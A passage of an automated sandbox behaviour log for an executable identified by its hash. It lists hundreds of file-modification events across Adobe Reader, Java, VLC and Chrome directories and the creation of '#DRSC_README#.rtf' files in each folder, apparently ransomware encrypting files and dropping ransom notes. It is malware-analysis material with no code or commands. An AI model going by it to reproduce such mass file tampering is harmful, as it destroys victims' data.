710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunpkcs11.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javaws.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\tzdb.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_partialselected-default_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\cursors.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\desktop.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner_process.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\improved-office-to-pdf.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\el.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 